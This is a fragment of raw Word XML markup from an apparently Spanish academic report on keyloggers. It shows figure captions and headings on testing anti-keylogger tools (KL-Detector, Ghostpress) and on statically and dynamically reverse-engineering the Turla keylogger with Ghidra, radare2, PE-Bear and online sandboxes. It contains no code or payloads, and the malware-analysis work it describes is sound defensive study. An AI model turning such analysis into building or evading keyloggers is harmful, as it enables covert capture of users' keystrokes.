      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1335692848"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve">CITATION Vir4 \l 3082 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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735078FB" wp14:editId="713E317D">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51" w:name="_Toc19358182"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>43</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Virus Total muestra como malware a Ghostpress con algunos de sus motores.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="151"/>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End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DF019A">
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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79FD6F6F" wp14:editId="0AA8EC3D">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2" w:name="_Toc19358183"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>44</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Captura de datos efectuada por el keylogger aun funcionando el anti-keylogger.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="152"/>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0D7B9DD4" wp14:editId="5A62944C">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3" w:name="_Toc19358184"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>45</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. El anti-keylogger no trata bien las teclas acentuadas que si hace el keylogger.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="153"/>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4" w:name="_Toc18453525"/>
      <w:bookmarkStart w:id="155" w:name="_Toc19810078"/>
      <w:r>
        <w:t xml:space="preserve">Análisis de </w:t>
      </w:r>
      <w:r w:rsidR="00681FDA">
        <w:t>KL-Detector</w:t>
      </w:r>
      <w:bookmarkEnd w:id="154"/>
      <w:bookmarkEnd w:id="155"/>
    </w:p>
    <w:p w:rsidR="00681FDA" w:rsidRDefault="00681FDA" w:rsidP="00D67CCC">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>KL-Detector</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1693566293"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve">CITATION KLDetector \l 3082 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019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12E00FFD" wp14:editId="38D2115C">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6" w:name="_Toc19358185"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>46</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Aviso de KL-Detector informando de la detección de un keylogger.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="156"/>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7" w:name="_Toc18453526"/>
      <w:bookmarkStart w:id="158" w:name="_Toc19810079"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Reversing de un Keylogger</w:t>
      </w:r>
      <w:bookmarkEnd w:id="157"/>
      <w:bookmarkEnd w:id="158"/>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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="008C4F84">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="008C4F84">
            <w:instrText xml:space="preserve"> CITATION Fue \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="008C4F84">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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9" w:name="_Toc18453527"/>
      <w:bookmarkStart w:id="160" w:name="_Toc19810080"/>
      <w:r>
        <w:t>Análisis preliminar del binario</w:t>
      </w:r>
      <w:bookmarkEnd w:id="159"/>
      <w:bookmarkEnd w:id="160"/>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DF0D5F4" wp14:editId="4B4CE22F">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61" w:name="_Toc19358186"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>47</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Muestra de PE-Bear. Herramienta para analizar cabeceras PE de ejecutables.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="161"/>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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="003533CE">
            <w:rPr>
              <w:b/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="003533CE">
            <w:rPr>
              <w:b/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Mic \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="003533CE">
            <w:rPr>
              <w:b/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:b/>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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F8DF851" wp14:editId="647C340F">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2" w:name="_Toc19358187"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>48</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Muestra parcial del desensamblado del binario con la herramienta PE-Bear.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="162"/>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0BE60E3A" wp14:editId="13BC7454">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3" w:name="_Toc19358188"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>49</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Muestra de cadenas de texto encontradas en el binario.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="163"/>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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="007D03FE">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="007D03FE">
            <w:instrText xml:space="preserve"> CITATION Vir \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="007D03FE">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="008F69D1">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00472512">
            <w:instrText xml:space="preserve">CITATION Vir1 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="008F69D1">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[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3FC78944" wp14:editId="64E9CBDE">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4" w:name="_Toc19358189"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>50</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Detección de Turla</w:t>
      </w:r>
      <w:r w:rsidR="00580CC4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Keylogger por Antivirus de Microsoft.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="164"/>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783EFF80" wp14:editId="23DCDB5F">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5" w:name="_Toc19358190"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>51</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Muestra de la información ofrecida en Virus Total</w:t>
      </w:r>
      <w:r w:rsidR="009A1F59">
        <w:t xml:space="preserve"> (13-agosto-2019)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="165"/>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End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DF019A" w:rsidRPr="00DF019A">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6AD88761" wp14:editId="0FCE731A">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6" w:name="_Toc19358191"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>52</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Muestra ejecución </w:t>
      </w:r>
      <w:r w:rsidR="003E7CB4">
        <w:t xml:space="preserve">del binario </w:t>
      </w:r>
      <w:r>
        <w:t>en entorno virtual de Hybrid Analysis</w:t>
      </w:r>
      <w:r w:rsidR="003E7CB4">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="166"/>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End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DF019A" w:rsidRPr="00DF019A">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7E225E6B" wp14:editId="078D34FF">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7" w:name="_Toc19358192"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>53</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Muestra de la información ofrecida por INTEZER Analyze.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="167"/>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End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DF019A">
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
            </w:rPr>
            <w:t>[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4F36D382" wp14:editId="055CF6E6">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8" w:name="_Toc19358193"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>54</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Muestra de binarios que tienen partes de coincidencia en el código.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="168"/>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5A7892C5" wp14:editId="5EA378C4">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9" w:name="_Toc19358194"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>55</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Ejemplo de punteros a zonas de memoria vacías para rellenar con datos.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="169"/>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End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DF019A">
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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405CD1F1" wp14:editId="43EEE31E">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70" w:name="_Toc19358195"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SE</w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve">Q Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>56</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Muestra de bloque de código donde hay repetidas operaciones XOR.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="170"/>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3E8BC433" wp14:editId="12F2AB40">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71" w:name="_Toc19358196"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>57</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Muestra tras ejecución dinámica del binario de Turla Keylogger.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="171"/>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2" w:name="_Toc18453528"/>
      <w:bookmarkStart w:id="173" w:name="_Toc19810081"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Análisis estático</w:t>
      </w:r>
      <w:bookmarkEnd w:id="172"/>
      <w:bookmarkEnd w:id="173"/>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End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DF019A" w:rsidRPr="00DF019A">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02A07E1C" wp14:editId="6212B310">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4" w:name="_Toc19358197"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>58</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00301073">
        <w:t xml:space="preserve">Muestra parcial de la </w:t>
      </w:r>
      <w:r>
        <w:t>pantalla de Ghidra una vez cargado el binario a analizar.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="174"/>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End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DF019A" w:rsidRPr="00DF019A">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End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DF019A" w:rsidRPr="00DF019A">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026C642E" wp14:editId="134BEA64">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5" w:name="_Toc19358198"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>59</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Muestra parcial de radare2 junto con Cutter una vez cargado el binario a analizar.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="175"/>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End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DF019A">
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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lang w:eastAsia="es-ES"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251670528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="626BC237" wp14:editId="5B069830">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17324F" w:rsidRPr="00A8175F" w:rsidRDefault="0017324F" w:rsidP="00132C46">
                            <w:pPr>
                              <w:pStyle w:val="Descripcin"/>
                              <w:rPr>
                                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                                <w:noProof/>
                                <w:lang w:eastAsia="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:bookmarkStart w:id="176" w:name="_Toc19358199"/>
                            <w:r>
                              <w:t xml:space="preserve">Ilustración </w:t>
                            </w:r>
                            <w:r w:rsidR="008400F5">
                              <w:fldChar w:fldCharType="begin"/>
                            </w:r>
                            <w:r w:rsidR="008400F5">
                              <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
                            </w:r>
                            <w:r w:rsidR="008400F5">
                              <w:fldChar w:fldCharType="separate"/>
                            </w:r>
                            <w:r w:rsidR="00E24312">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>60</w:t>
                            </w:r>
                            <w:r w:rsidR="008400F5">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>.Más información ofrecida por el comando «ia» de radare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BC237"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17324F" w:rsidRPr="00A8175F" w:rsidRDefault="0017324F" w:rsidP="00132C46">
                      <w:pPr>
                        <w:pStyle w:val="Descripcin"/>
                        <w:rPr>
                          <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                          <w:noProof/>
                          <w:lang w:eastAsia="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:bookmarkStart w:id="177" w:name="_Toc19358199"/>
                      <w:r>
                        <w:t xml:space="preserve">Ilustración </w:t>
                      </w:r>
                      <w:r w:rsidR="008400F5">
                        <w:fldChar w:fldCharType="begin"/>
                      </w:r>
                      <w:r w:rsidR="008400F5">
                        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
                      </w:r>
                      <w:r w:rsidR="008400F5">
                        <w:fldChar w:fldCharType="separate"/>
                      </w:r>
                      <w:r w:rsidR="00E24312">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>60</w:t>
                      </w:r>
                      <w:r w:rsidR="008400F5">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>.Más información ofrecida por el comando «ia» de radare2.</w:t>
                      </w:r>
                      <w:bookmarkEnd w:id="177"/>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27094BF8" wp14:editId="2AB43D77">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17324F" w:rsidRPr="00045AC0" w:rsidRDefault="0017324F" w:rsidP="00CE475D">
                            <w:pPr>
                              <w:pStyle w:val="Descripcin"/>
                              <w:rPr>
                                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                                <w:noProof/>
                              </w:rPr>
                            </w:pPr>
                            <w:bookmarkStart w:id="178" w:name="_Toc19358200"/>
                            <w:r>
                              <w:t xml:space="preserve">Ilustración </w:t>
                            </w:r>
                            <w:r w:rsidR="008400F5">
                              <w:fldChar w:fldCharType="begin"/>
                            </w:r>
                            <w:r w:rsidR="008400F5">
                              <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
                            </w:r>
                            <w:r w:rsidR="008400F5">
                              <w:fldChar w:fldCharType="separate"/>
                            </w:r>
                            <w:r w:rsidR="00E24312">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>61</w:t>
                            </w:r>
                            <w:r w:rsidR="008400F5">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>. Información ofrecida por el comando «ia» de radar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094BF8"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17324F" w:rsidRPr="00045AC0" w:rsidRDefault="0017324F" w:rsidP="00CE475D">
                      <w:pPr>
                        <w:pStyle w:val="Descripcin"/>
                        <w:rPr>
                          <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                          <w:noProof/>
                        </w:rPr>
                      </w:pPr>
                      <w:bookmarkStart w:id="179" w:name="_Toc19358200"/>
                      <w:r>
                        <w:t xml:space="preserve">Ilustración </w:t>
                      </w:r>
                      <w:r w:rsidR="008400F5">
                        <w:fldChar w:fldCharType="begin"/>
                      </w:r>
                      <w:r w:rsidR="008400F5">
                        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
                      </w:r>
                      <w:r w:rsidR="008400F5">
                        <w:fldChar w:fldCharType="separate"/>
                      </w:r>
                      <w:r w:rsidR="00E24312">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>61</w:t>
                      </w:r>
                      <w:r w:rsidR="008400F5">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>. Información ofrecida por el comando «ia» de radare2.</w:t>
                      </w:r>
                      <w:bookmarkEnd w:id="179"/>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5FA6C5EF" wp14:editId="1C045B83">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6E376377" wp14:editId="5DEFB2E1">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4FAE5C3F" wp14:editId="6F15B60D">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bookmarkStart w:id="180" w:name="_Toc19358201"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>62</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Información de las secciones, permisos y entropía.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="180"/>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2EF5F068" wp14:editId="2C149DF9">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bookmarkStart w:id="181" w:name="_Toc19358202"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>63</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Muestra del punto de entrada de la DLL</w:t>
      </w:r>
      <w:r w:rsidR="00E279CA">
        <w:t xml:space="preserve"> en Ghidra</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="181"/>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End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DF019A" w:rsidRPr="00DF019A">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2DFD2B48" wp14:editId="64722A1E">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82" w:name="_Toc19358203"/>
      <w:r>
